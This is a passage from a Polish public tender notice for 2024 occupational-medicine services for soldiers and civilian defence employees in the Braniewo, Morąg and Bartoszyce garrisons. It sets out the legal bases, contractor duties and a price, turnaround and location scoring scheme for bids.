ŻOŁNIERZY DOBROWOLNEJ ZASADNICZEJ SŁUŻBY WOJSKOWEJ I PRACOWNIKÓW RON Z JEDNOSTEK I INSTYTUCJI WOJSKOWYCH BĘDĄCYCH NA ZAOPATRZENIU 21WOG<br/> <br/>KOD CPV:<br/>85121000 – 3 – usługi medyczne<br/>1.	Przedmiotem zamówienia dla części zamówienia nr 2, są usługi medyczne obejmujące profilaktyczne badania lekarskie (wstępne, okresowe, kontrolne, sanitarno – epidemiologiczne, badania diagnostyczne, badania laboratoryjne, konsultacje specjalistyczne) żołnierzy, żołnierzy Dobrowolnej Zasadniczej Służby Wojskowej i pracowników RON, przeprowadzanie badań lekarskich i psychologicznych pracowników ochrony fizycznej, prowadzenie dyspensaryzacji w stosunku do żołnierzy, kwalifikowanie i kierowanie żołnierzy na turnusy leczniczo-profilaktyczne, wykonywanie czynności lekarskich w zakresie udziału w posiedzeniach komisji BHP i społecznych przeglądach stanowisk służby i pracy. Usługi te realizowane będą dla żołnierzy, żołnierzy DZSW i pracowników RON Jednostek i Instytucji Wojskowych z Garnizonu Braniewo będącego na zaopatrzeniu 21WOG.<br/>Szczegółowe zestawienie wykazu czynności (rodzaju badań) wchodzących w skład przedmiotu zamówienia stanowi załączniki nr 1 do opisu przedmiotu zamówienia (OPZ) .<br/>2.	Przedmiot zamówienia będzie realizowany zgodnie z obowiązkiem pracodawcy wynikającym z przepisów prawa, w szczególności: art. 229 ustawy z dnia 26 czerwca 1974 r. Kodeks Pracy (tj. Dz.U. z 2023 r., poz. 1465), Ustawy z dnia 27 czerwca 1997 r. o służbie medycyny pracy (t.j. Dz.U. z 2022 poz. 437), Rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U. 2023, poz. 607), Rozporządzeniem Ministra Zdrowia z dnia 5 grudnia 2022 r. w sprawie badań lekarskich osób ubiegających się o uprawnienia do kierowania pojazdami i kierowców (tj. Dz.U. z 2022 r., poz.2503), Rozporządzeniem Ministra Zdrowia z dnia 8 lipca 2014 r. w sprawie badań psychologicznych osób ubiegających się o uprawnienia do kierowania pojazdami, kierowców oraz osób wykonujących pracę na stanowisku kierowcy (Dz. U. z 2022 r., poz. 165 z późn.zm.) oraz przepisów resortowych:<br/> Ustawy z dnia 11 marca 2022 r. o obronie Ojczyzny (t.j. Dz.U. z 2022 r., poz. 2305 z późn. zm.), Rozporządzeniem Ministra Obrony Narodowej z dnia 9 sierpnia 2010 r. w sprawie służby medycyny pracy w jednostkach organizacyjnych podległych Ministrowi Obrony Narodowej (Dz. U. 2010 Nr 187 poz. 1257), Zarządzeniem Nr 12/MON z dnia 21 maja 2013 roku w sprawie utworzenia, przekształcenia i likwidacji podmiotów leczniczych w formie jednostki budżetowej z późn. zm. <br/>Badania lekarskie do celów sanitarno - epidemiologicznych wykonywane będą w oparciu o Ustawę z dnia 5 grudnia 2008 r. o zapobieganiu i zwalczaniu zakażeń i chorób zakaźnych u ludzi (tj. Dz. U. z 2023 r., poz. 1284 z poźn. zm.). <br/>Badania pracowników ochrony fizycznej realizowane będą zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 21 grudnia 2015 r. w sprawie badań lekarskich i psychologicznych osób ubiegających się o wpis lub posiadających wpis na listę kwalifikowanych pracowników ochrony fizycznej (Dz.U.2022, poz.2344). <br/>Wykonywanie czynności lekarskich w zakresie udział w posiedzeniach komisji BHP i społecznych przeglądach stanowisk służby i pracy, realizowane będą zgodnie z przepisami Ustawy z dnia 26 czerwca 1974 r. - Kodeks Pracy, (art. 237, Dz.U. z 2023 r., poz. 1465).<br/>Wykonawca akceptuje fakt, iż ilości badań lekarskich, laboratoryjnych, diagnostycznych i konsultacji specjalistycznych wyszczególnionych w poszczególnych częściach zamówienia są ilościami szacunkowymi i służyć będą wyłącznie do wyliczenia ceny oferty i wyboru Wykonawcy. Użyte przez Wykonawcę, (który złoży ofertę najkorzystniejszą) do obliczenia ceny oferowanej, ceny jednostkowe, będą stałe w okresie obowiązywania umowy.<br/>3.	Zamawiający nie ponosi konsekwencji finansowych zmniejszenia ilości badań.<br/>4.	Zamawiający zastrzega możliwość nie wykorzystania kwoty umowy w pełnej wysokości.<br/>5.	Wykonawcy należy się wynagrodzenie za faktycznie przeprowadzone badania.<br/>6.	Badanie profilaktyczne zakończone zostanie wydaniem zaświadczenia lekarskiego z przeprowadzonych badań na obowiązującym formularzu lub wydaniem wyników badań, które zlecił lekarz medycyny pracy.<br/>7.	Wykonawca zobowiązuje się prowadzić dokumentację medyczną pacjentów zgodnie z obowiązującymi przepisami w tym zakresie.<br/>8.	Wykonawca zobowiązuje się realizować procedurę odwoławczą zgodnie z zapisami Rozporządzenia Ministra Obrony Narodowej z dnia 9 sierpnia 2010 r. w sprawie służby medycyny pracy w jednostkach organizacyjnych podległych Ministrowi Obrony Narodowej (Dz. U. 2010, Nr 187 poz. 1257).<br/>9.	Wykonawca, który będzie realizował przedmiot zamówienia musi być wpisany do rejestru podmiotów wykonujących działalność leczniczą, o którym mowa w art. 100 i 106 ustawy <br/>z dnia 15 kwietnia 2011 r. o działalności leczniczej (t.j. Dz. U. z 2023, poz. 991 z późn.zm.) i posiadać aktualne ubezpieczenie OC, zgodnie z Rozporządzeniem Ministra Finansów z dnia 29 kwietnia 2019 r. w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej podmiotu wykonującego działalność leczniczą (Dz. U. z 2019 r. poz. 866 z późn. zm.).<br/><br/>CZĘŚĆ ZAMÓWIENIA NR 2 – BADANIA PROFILAKTYCZNE ŻOŁNIERZE GARNIZON BRANIEWO, BADANIA PROFILAKTYCZNE PRACOWNICY CYWILNI GARNIZON BRANIEWO:<br/>Wykaz jednostek i instytucji wojskowych z Garnizonu Braniewo do zaopatrywania w usługi medyczne z zakresu medycyny pracy:<br/>- 21 Wojskowy Oddział Gospodarczy w Braniewie;<br/>- 9 Brygada Kawalerii Pancernej w Braniewie;<br/>- Komórka wewnętrzna zamiejscowa OŻW w Braniewie;<br/>- Regionalne Centrum Informatyki w Braniewie;<br/>- 8 batalion radiotechniczny w Braniewie;<br/>- Centrum Rozpoznania i Wsparcia Walki Radioelektronicznej w Braniewie;<br/>- 6 Ośrodek Radioelektroniczny w Braniewie;<br/>- 43 batalion lekkiej piechoty w Braniewie.<br/><br/>1.	Usługi medyczne obejmujące przedmiot zamówienia muszą być wykonywane <br/>w Braniewie lub w obrębie do 50 km od Braniewa.<br/>2.	Badania wykonywane będą na podstawie skierowania wystawionego żołnierzowi/ żołnierzowi DZSW/pracownikowi RON przez pracodawcę do lekarza medycyny pracy, które będzie zawierało dane dotyczące zajmowanego stanowiska, czynników szkodliwych dla zdrowia lub warunków uciążliwych.<br/>3.	Lekarz medycyny pracy w oparciu o w/w skierowanie określa zakres badań i konsultacji. <br/>4.	Wykonawca wykona badania i konsultacje specjalistyczne oraz wystawi zaświadczenie lekarskie z przeprowadzonych badań okresowych w czasie zadeklarowanym przez Wykonawcę w ofercie. <br/>5.	Wykonawca po przeprowadzeniu badań wystawi zaświadczenie lekarskie z przeprowadzonych badań okresowych, które wręczy badanemu żołnierzowi/ żołnierzowi DZSW/pracownikowi RON do rąk własnych (oryginał plus kopia). Zaświadczenie będzie zawierało termin następnego badania lekarskiego określone pełną datą tj. dzień, miesiąc i rok. <br/>6.	Wykonawca po przeprowadzeniu przez okulistę badań okulistycznych i po stwierdzeniu konieczności stosowania przez żołnierza/ żołnierza DZSW/ pracownika RON okularów korygujących wzrok przy obsłudze monitora ekranowego udokumentuje konieczność korekcji wady wzroku, stosownym wpisem na zaświadczeniu lekarskim z przeprowadzonych badań okresowych.<br/>7.	Wykonawca realizować będzie usługi polegające na wykonywaniu czynności lekarskich w zakresie udziału w posiedzeniach komisji BHP i społecznych przeglądach stanowisk służby i pracy w Jednostkach i Instytucjach Wojskowych będących na zaopatrzeniu 21WOG.<br/>8.	Wykonawca będzie prowadził rejestr przyjmowanych żołnierzy/ żołnierza DZSW/ pracowników RON zawierający: imię i nazwisko, numer PESEL, adres, nazwisko lekarza udzielającego świadczenia, datę badania i inne niezbędne dane do identyfikacji udzielonego świadczenia zdrowotnego.<br/>9.	Wykonawca prześle fakturę za wykonane usługi medycyny pracy, wystawioną oddzielnie za każdą jednostkę i instytucję wojskową wraz z imiennym, sporządzonym w sposób czytelny, wykazem przebadanych żołnierzy, żołnierzy DZSW i pracowników RON z nr pesel oraz rodzajem i ilością przeprowadzonych badań, łączną wartością przeprowadzonych badań oraz łączną ilością wykonanych badań. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85121000-3 - Usługi medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-02 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">UWAGA:<br/>Określone w formularzu ofertowym ilości badań stanowią ilość szacunkową. Wyliczona dla tych ilości cena brutto oferty będzie służyła do porównania złożonych w postępowaniu ofert.<br/>Wartością umowy dla każdej części zamówienia będzie kwota środków przeznaczonych na sfinansowanie zamówienia (odpowiednio dla części zamówienia).<br/><br/>2.	Przy wyborze najkorzystniejszej oferty dla części zamówienia nr 2, 3, 4 Zamawiający będzie się kierował następującymi kryteriami: <br/>1)	Cena brutto oferty - 60%<br/><br/> najniższa oferowana cena brutto <br/>Liczba punktów = ------------------------------------------- x 100 pkt x 60%<br/> cena brutto oferty badanej<br/><br/>2)	Czas wykonania badań profilaktycznych, specjalistycznych oraz wystawienia zaświadczenia (odpowiednio dla części zamówienia) – 20%<br/>•	w ciągu jednego dnia roboczego od okazania skierowania przez żołnierza/żołnierza DZSW/pracownika RON: 20 pkt<br/>•	w ciągu dwóch dni roboczych od okazania skierowania przez żołnierza/żołnierza DZSW/pracownika RON: 10 pkt<br/>•	od trzech do pięciu dni roboczych od okazania skierowania przez żołnierza/żołnierza DZSW/pracownika RON: 0 pkt<br/><br/>3) Miejsce wykonania badań profilaktycznych (odpowiednio dla części zamówienia) – 20%<br/>•	jeśli badania profilaktyczne będą wykonane w miejscowości Braniewo, Morąg, Bartoszyce: 20 pkt<br/>•	jeśli badania profilaktyczne nie będą wykonane w miejscowości Braniewo, Morąg, Bartoszyce: 0 pkt <br/>UWAGA! Usługi medyczne obejmujące przedmiot zamówienia muszą być wykonywane w Braniewie/Morągu/Bartoszycach (odpowiednio dla części zamówienia) lub w obrębie:<br/>do 50 km od Braniewa (dla części zamówienia nr 2);<br/>lub do 60 km od Morąga (dla części zamówienia nr 3);<br/>lub do 120 km od Bartoszyc (dla części zamówienia nr 4).<br/>– odpowiednio dla części zamówienia<br/><br/>3.	Liczba punktów uzyskanych przez daną ofertę będzie wyliczana według wzoru: <br/>dla części zamówienia nr 2, 3, 4<br/>P = K1 +K2 +K3<br/>P - liczba punktów uzyskanych przez daną ofertę w trzech kryteriach;<br/>K1 - liczba punktów uzyskanych przez daną ofertę w kryterium „Cena brutto oferty”;<br/>K2 - liczba punktów uzyskanych przez daną ofertę w kryterium „Czas wykonania badań profilaktycznych, specjalistycznych oraz wystawienia zaświadczenia”; <br/>K3 - liczba punktów uzyskanych przez daną ofertę w kryterium „Miejsce wykonania badań profilaktycznych”.<br/><br/>4.	Oferta będzie podlegać ocenie dla każdej części zamówienia. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>5.	Za ofertę najkorzystniejszą zostanie uznana ta oferta spośród złożonych, która uzyska najwyższą liczbę punktów. Maksymalna liczba punktów, jaką może osiągnąć oferta wynosi 100.<br/>6.	Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wykonania badań profilaktycznych, specjalistycznych oraz wystawienia zaświadczenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Miejsce wykonania badań profilaktycznych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> USŁUGI MEDYCZNE Z ZAKRESU MEDYCYNY PRACY NA 2024 R. DLA ŻOŁNIERZY, ŻOŁNIERZY DOBROWOLNEJ ZASADNICZEJ SŁUŻBY WOJSKOWEJ I PRACOWNIKÓW RON Z JEDNOSTEK I INSTYTUCJI WOJSKOWYCH BĘDĄCYCH NA ZAOPATRZENIU 21WOG<br/> <br/>KOD CPV:<br/>85121000 – 3 – usługi medyczne<br/>1.	Przedmiotem zamówienia dla części zamówienia nr 3, są usługi medyczne obejmujące profilaktyczne badania lekarskie (wstępne, okresowe, kontrolne, sanitarno – epidemiologiczne, badania diagnostyczne, badania laboratoryjne, konsultacje specjalistyczne) żołnierzy, żołnierzy Dobrowolnej Zasadniczej Służby Wojskowej i pracowników RON, przeprowadzanie badań lekarskich i psychologicznych pracowników ochrony fizycznej, prowadzenie dyspensaryzacji w stosunku do żołnierzy, kwalifikowanie i kierowanie żołnierzy na turnusy leczniczo-profilaktyczne, wykonywanie czynności lekarskich w zakresie udziału w posiedzeniach komisji BHP i społecznych przeglądach stanowisk służby i pracy. Usługi te realizowane będą dla żołnierzy, żołnierzy DZSW i pracowników RON Jednostek i Instytucji Wojskowych z Garnizonu Morąg, będącego na zaopatrzeniu 21WOG.<br/>Szczegółowe zestawienie wykazu czynności (rodzaju badań) wchodzących w skład przedmiotu zamówienia stanowi załączniki nr 1 do opisu przedmiotu zamówienia (OPZ) .<br/>2.	Przedmiot zamówienia będzie realizowany zgodnie z obowiązkiem pracodawcy wynikającym z przepisów prawa, w szczególności: art. 229 ustawy z dnia 26 czerwca 1974 r. Kodeks Pracy (tj. Dz.U. z 2023 r., poz. 1465), Ustawy z dnia 27 czerwca 1997 r. o służbie medycyny pracy (t.j. Dz.U. z 2022 poz. 437), Rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U. 2023, poz. 607), Rozporządzeniem Ministra Zdrowia z dnia 5 grudnia 2022 r. w sprawie badań lekarskich osób ubiegających się o uprawnienia do kierowania pojazdami i kierowców (tj. Dz.U. z 2022 r., poz.2503), Rozporządzeniem Ministra Zdrowia z dnia 8 lipca 2014 r. w sprawie badań psychologicznych osób ubiegających się o uprawnienia do kierowania pojazdami, kierowców oraz osób wykonujących pracę na stanowisku kierowcy (Dz. U. z 2022 r., poz. 165 z późn.zm.) oraz przepisów resortowych:<br/> Ustawy z dnia 11 marca 2022 r. o obronie Ojczyzny (t.j. Dz.U. z 2022 r., poz. 2305 z późn. zm.), Rozporządzeniem Ministra Obrony Narodowej z dnia 9 sierpnia 2010 r. w sprawie służby medycyny pracy w jednostkach organizacyjnych podległych Ministrowi Obrony Narodowej (Dz. U. 2010 Nr 187 poz. 1257), Zarządzeniem Nr 12/MON z dnia 21 maja 2013 roku w sprawie utworzenia, przekształcenia i likwidacji podmiotów leczniczych w formie jednostki budżetowej z późn. zm. <br/>Badania lekarskie do celów sanitarno - epidemiologicznych wykonywane będą w oparciu o Ustawę z dnia 5 grudnia 2008 r. o zapobieganiu i zwalczaniu zakażeń i chorób zakaźnych u ludzi (tj. Dz. U. z 2023 r., poz. 1284 z poźn. zm.). <br/>Badania pracowników ochrony fizycznej realizowane będą zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 21 grudnia 2015 r. w sprawie badań lekarskich i psychologicznych osób ubiegających się o wpis lub posiadających wpis na listę kwalifikowanych pracowników ochrony fizycznej (Dz.U.2022, poz.2344). <br/>Wykonywanie czynności lekarskich w zakresie udział w posiedzeniach komisji BHP i społecznych przeglądach stanowisk służby i pracy, realizowane będą zgodnie z przepisami Ustawy z dnia 26 czerwca 1974 r. - Kodeks Pracy, (art. 237, Dz.U. z 2023 r., poz. 1465).<br/>Wykonawca akceptuje fakt, iż ilości badań lekarskich, laboratoryjnych, diagnostycznych i konsultacji specjalistycznych wyszczególnionych w poszczególnych częściach zamówienia są ilościami szacunkowymi i służyć będą wyłącznie do wyliczenia ceny oferty i wyboru Wykonawcy. Użyte przez Wykonawcę, (który złoży ofertę najkorzystniejszą) do obliczenia ceny oferowanej, ceny jednostkowe, będą stałe w okresie obowiązywania umowy.<br/>3.	Zamawiający nie ponosi konsekwencji finansowych zmniejszenia ilości badań.<br/>4.	Zamawiający zastrzega możliwość nie wykorzystania kwoty umowy w pełnej wysokości.<br/>5.	Wykonawcy należy się wynagrodzenie za faktycznie przeprowadzone badania.<br/>6.	Badanie profilaktyczne zakończone zostanie wydaniem zaświadczenia lekarskiego z przeprowadzonych badań na obowiązującym formularzu lub wydaniem wyników badań, które zlecił lekarz medycyny pracy.<br/>7.	Wykonawca zobowiązuje się prowadzić dokumentację medyczną pacjentów zgodnie z obowiązującymi przepisami w tym zakresie.<br/>8.	Wykonawca zobowiązuje się realizować procedurę odwoławczą zgodnie z zapisami Rozporządzenia Ministra Obrony Narodowej z dnia 9 sierpnia 2010 r. w sprawie służby medycyny pracy w jednostkach organizacyjnych podległych Ministrowi Obrony Narodowej (Dz. U. 2010, Nr 187 poz. 1257).<br/>9.	Wykonawca, który będzie realizował przedmiot zamówienia musi być wpisany do rejestru podmiotów wykonujących działalność leczniczą, o którym mowa w art. 100 i 106 ustawy <br/>z dnia 15 kwietnia 2011 r. o działalności leczniczej (t.j. Dz. U. z 2023, poz. 991 z późn.zm.) i posiadać aktualne ubezpieczenie OC, zgodnie z Rozporządzeniem Ministra Finansów z dnia 29 kwietnia 2019 r. w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej podmiotu wykonującego działalność leczniczą (Dz. U. z 2019 r. poz. 866 z późn. zm.).<br/><br/>CZĘŚĆ ZAMÓWIENIA NR 3 – BADANIA PROFILAKTYCZNE ŻOŁNIERZE GARNIZON MORĄG, BADANIA PROFILAKTYCZNE PRACOWNICY CYWILNI GARNIZON MORĄG:<br/>Wykaz jednostek i instytucji wojskowych z Garnizonu Morąg do zaopatrywania w usługi medyczne z zakresu medycyny pracy:<br/>- 21 Wojskowy Oddział Gospodarczy w Morągu;<br/>- 20 Brygada Zmechanizowana w Morągu;<br/>- Komórka wewnętrzna zamiejscowa OŻW w Morągu;<br/>- Regionalne Centrum Informatyki w Morągu;<br/>- 42 batalion lekkiej piechoty w Morągu.<br/><br/>1.	Usługi medyczne obejmujące przedmiot zamówienia muszą być wykonywane <br/>w Morągu lub w obrębie do 60 km od Morąga.<br/>2.	Badania wykonywane będą na podstawie skierowania wystawionego żołnierzowi/ żołnierzowi DZSW/pracownikowi RON przez pracodawcę do lekarza medycyny pracy, które będzie zawierało dane dotyczące zajmowanego stanowiska, czynników szkodliwych dla zdrowia lub warunków uciążliwych.<br/>3.	Lekarz medycyny pracy w oparciu o w/w skierowanie określa zakres badań i konsultacji. <br/>4.	Wykonawca wykona badania i konsultacje specjalistyczne oraz wystawi zaświadczenie lekarskie z przeprowadzonych badań okresowych w okresie zadeklarowanym przez Wykonawcę w ofercie. <br/>5.	Wykonawca po przeprowadzeniu badań wystawi zaświadczenie lekarskie z przeprowadzonych badań okresowych, które wręczy badanemu żołnierzowi/ żołnierzowi DZSW/pracownikowi RON do rąk własnych (oryginał plus kopia). Zaświadczenie będzie zawierało termin następnego badania lekarskiego określone pełną datą tj. dzień, miesiąc i rok. <br/>6.	Wykonawca po przeprowadzeniu przez okulistę badań okulistycznych i po stwierdzeniu konieczności stosowania przez żołnierza/ żołnierza DZSW/pracownika RON okularów korygujących wzrok przy obsłudze monitora ekranowego udokumentuje konieczność korekcji wady wzroku, stosownym wpisem na zaświadczeniu lekarskim z przeprowadzonych badań okresowych.<br/>7.	Wykonawca realizować będzie usługi polegające na wykonywaniu czynności lekarskich w zakresie udziału w posiedzeniach komisji BHP i społecznych przeglądach stanowisk służby i pracy w Jednostkach i Instytucjach Wojskowych będących na zaopatrzeniu 21WOG.<br/>8.	Wykonawca będzie prowadził rejestr przyjmowanych żołnierzy/ żołnierzy DZSW/ pracowników RON zawierający: imię i nazwisko, numer PESEL, adres, nazwisko lekarza udzielającego świadczenia, datę badania i inne niezbędne dane do identyfikacji udzielonego świadczenia zdrowotnego.<br/>9.	Wykonawca prześle fakturę za wykonane usługi medycyny pracy, wystawioną oddzielnie za każdą jednostkę i instytucję wojskową, wraz z imiennym, sporządzonym w sposób czytelny, wykazem przebadanych żołnierzy, żołnierzy DZSW i pracowników RON z nr pesel oraz rodzajem i ilością przeprowadzonych badań, łączną wartością przeprowadzonych badań oraz łączną ilością wykonanych badań. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85121000-3 - Usługi medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-02 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">UWAGA:<br/>Określone w formularzu ofertowym ilości badań stanowią ilość szacunkową. Wyliczona dla tych ilości cena brutto oferty będzie służyła do porównania złożonych w postępowaniu ofert.<br/>Wartością umowy dla każdej części zamówienia będzie kwota środków przeznaczonych na sfinansowanie zamówienia (odpowiednio dla części zamówienia).<br/><br/>2.	Przy wyborze najkorzystniejszej oferty dla części zamówienia nr 2, 3, 4 Zamawiający będzie się kierował następującymi kryteriami: <br/>1)	Cena brutto oferty - 60%<br/><br/> najniższa oferowana cena brutto <br/>Liczba punktów = ------------------------------------------- x 100 pkt x 60%<br/> cena brutto oferty badanej<br/><br/>2)	Czas wykonania badań profilaktycznych, specjalistycznych oraz wystawienia zaświadczenia (odpowiednio dla części zamówienia) – 20%<br/>•	w ciągu jednego dnia roboczego od okazania skierowania przez żołnierza/żołnierza DZSW/pracownika RON: 20 pkt<br/>•	w ciągu dwóch dni roboczych od okazania skierowania przez żołnierza/żołnierza DZSW/pracownika RON: 10 pkt<br/>•	od trzech do pięciu dni roboczych od okazania skierowania przez żołnierza/żołnierza DZSW/pracownika RON: 0 pkt<br/><br/>3) Miejsce wykonania badań profilaktycznych (odpowiednio dla części zamówienia) – 20%<br/>•	jeśli badania profilaktyczne będą wykonane w miejscowości Braniewo, Morąg, Bartoszyce: 20 pkt<br/>•	jeśli badania profilaktyczne nie będą wykonane w miejscowości Braniewo, Morąg, Bartoszyce: 0 pkt <br/>UWAGA! Usługi medyczne obejmujące przedmiot zamówienia muszą być wykonywane w Braniewie/Morągu/Bartoszycach (odpowiednio dla części zamówienia) lub w obrębie:<br/>do 50 km od Braniewa (dla części zamówienia nr 2);<br/>lub do 60 km od Morąga (dla części zamówienia nr 3);<br/>lub do 120 km od Bartoszyc (dla części zamówienia nr 4);<br/>– odpowiednio dla części zamówienia<br/><br/>3.	Liczba punktów uzyskanych przez daną ofertę będzie wyliczana według wzoru: <br/>dla części zamówienia nr 2, 3, 4<br/>P = K1 +K2 +K3<br/>P - liczba punktów uzyskanych przez daną ofertę w trzech kryteriach;<br/>K1 - liczba punktów uzyskanych przez daną ofertę w kryterium „Cena brutto oferty”;<br/>K2 - liczba punktów uzyskanych przez daną ofertę w kryterium „Czas wykonania badań profilaktycznych, specjalistycznych oraz wystawienia zaświadczenia”; <br/>K3 - liczba punktów uzyskanych przez daną ofertę w kryterium „Miejsce wykonania badań profilaktycznych”.<br/><br/>4.	Oferta będzie podlegać ocenie dla każdej części zamówienia. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>5.	Za ofertę najkorzystniejszą zostanie uznana ta oferta spośród złożonych, która uzyska najwyższą liczbę punktów. Maksymalna liczba punktów, jaką może osiągnąć oferta wynosi 100.<br/>6.	Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wykonania badań profilaktycznych, specjalistycznych oraz wystawienia zaświadczenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Miejsce wykonania badań profilaktycznych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> USŁUGI MEDYCZNE Z ZAKRESU MEDYCYNY PRACY NA 2024 R. DLA ŻOŁNIERZY, ŻOŁNIERZY DOBROWOLNEJ ZASADNICZEJ SŁUŻBY WOJSKOWEJ I PRACOWNIKÓW RON Z JEDNOSTEK I INSTYTUCJI WOJSKOWYCH BĘDĄCYCH NA ZAOPATRZENIU 21WOG<br/> <br/>KOD CPV:<br/>85121000 – 3 – usługi medyczne<br/>1.	Przedmiotem zamówienia dla części zamówienia nr 4, są usługi medyczne obejmujące profilaktyczne badania lekarskie (wstępne, okresowe, kontrolne, sanitarno – epidemiologiczne, badania diagnostyczne, badania laboratoryjne, konsultacje specjalistyczne) żołnierzy, żołnierzy Dobrowolnej Zasadniczej Służby Wojskowej i pracowników RON, przeprowadzanie badań lekarskich i psychologicznych pracowników ochrony fizycznej, prowadzenie dyspensaryzacji w stosunku do żołnierzy, kwalifikowanie i kierowanie żołnierzy na turnusy leczniczo-profilaktyczne, wykonywanie czynności lekarskich w zakresie udziału w posiedzeniach komisji BHP i społecznych przeglądach stanowisk służby i pracy. Usługi te realizowane będą dla żołnierzy, żołnierzy DZSW i pracowników RON Jednostek i Instytucji Wojskowych z Garnizonu Bartoszyce będącego na zaopatrzeniu 21WOG.<br/>Szczegółowe zestawienie wykazu czynności (rodzaju badań) wchodzących w skład przedmiotu zamówienia stanowi załączniki nr 1 do opisu przedmiotu zamówienia (OPZ) .<br/>2.	Przedmiot zamówienia będzie realizowany zgodnie z obowiązkiem pracodawcy wynikającym z przepisów prawa, w szczególności: art. 229 ustawy z dnia 26 czerwca 1974 r. Kodeks Pracy (tj. Dz.U. z 2023 r., poz. 1465), Ustawy z dnia 27 czerwca 1997 r. o służbie medycyny pracy (t.j. Dz.U. z 2022 poz. 437), Rozporządzeniem Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U. 2023, 